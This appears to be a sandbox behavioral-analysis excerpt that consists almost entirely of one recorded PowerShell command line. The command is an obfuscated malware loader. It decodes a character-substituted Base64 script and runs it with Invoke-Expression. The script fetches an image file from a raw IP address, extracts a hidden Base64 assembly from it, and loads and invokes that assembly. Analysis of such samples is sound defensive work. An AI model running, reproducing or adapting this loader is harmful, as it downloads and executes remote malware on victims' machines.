Behavioral Analysis

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#c#Bv#HI#d##g#D0#I##n#HQ#e#B0#C4#Z#Bv#G8#ZwBr#Gw#YwBl#Gg#YwBu#HI#dQB0#GU#ZQBy#G8#ZgBk#G8#bwBn#HI#bwBm#HQ#cgBl#HM#bgBp#G4#YQBj#GU#dw#v#DI#Mg#x#C8#NQ#4#DE#Lg#0#DI#Mg#u#Dk#Lg#2#DE#Mg#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GE#dQBz#HQ#aQBu#Gk#d#Bl#C##PQ#g#CQ#ZQB4#H##bwBy#HQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HY#aQBj#Gk#cwBz#Gk#d#B5#C##PQ#g#Cc#a#B0#HQ#c##6#C8#Lw#x#Dk#Mg#u#DM#Lg#x#D##MQ#u#DE#N##2#C8#e#Bh#G0#c#Bw#C8#d#Bl#HM#d##v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Jw#7#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#I##9#C##TgBl#Hc#LQBP#GI#agBl#GM#d##g#FM#eQBz#HQ#ZQBt#C4#TgBl#HQ#LgBX#GU#YgBD#Gw#aQBl#G4#d##7#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#C##PQ#g#CQ#dwBh#HQ#YwBo#G0#ZQBu#HQ#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#dgBp#GM#aQBz#HM#aQB0#Hk#KQ#7#CQ#e#B5#Gw#bwBn#HI#YQBw#Gg#ZQBk#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#YQBz#H##ZQBy#G0#YQB0#G8#dQBz#Ck#Ow#k#Gw#YQB1#G4#Z#By#Hk#dwBv#G0#ZQBu#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#UwBU#EE#UgBU#D4#Pg#n#Ds#J#Bj#GE#c#By#G8#bgBp#GM#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#RQBs#HY#aQBz#Hk#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#p#Ds#J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##9#C##J#B4#Hk#b#Bv#Gc#cgBh#H##a#Bl#GQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bj#GE#c#By#G8#bgBp#GM#KQ#7#CQ#RQBs#HY#aQBz#Hk#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#By#GU#cwB0#G8#cgBh#HQ#aQB2#GU#I##t#Gc#d##g#CQ#RQBs#HY#aQBz#Hk#Ow#k#EU#b#B2#Gk#cwB5#C##Kw#9#C##J#Bs#GE#dQBu#GQ#cgB5#Hc#bwBt#GU#bg#u#Ew#ZQBu#Gc#d#Bo#Ds#J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#C##PQ#g#CQ#cgBl#HM#d#Bv#HI#YQB0#Gk#dgBl#C##LQ#g#CQ#RQBs#HY#aQBz#Hk#Ow#k#H##cgBp#HM#cwBp#GU#cg#g#D0#I##k#Hg#eQBs#G8#ZwBy#GE#c#Bo#GU#Z##u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#BF#Gw#dgBp#HM#eQ#s#C##J#Bw#FMBYwBp#Gw#bwBn#GU#bgBl#HM#aQBz#Ck#Ow#k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bw#HI#aQBz#HM#aQBl#HI#KQ#7#CQ#cgBl#Gk#bQBw#HI#aQBz#G8#bgBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#G0#ZQBz#G8#d#By#G8#YwBo#GE#b##p#Ds#J#Bj#HU#dgBl#G4#YQBu#HQ#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bh#HU#cwB0#Gk#bgBp#HQ#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Mg#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"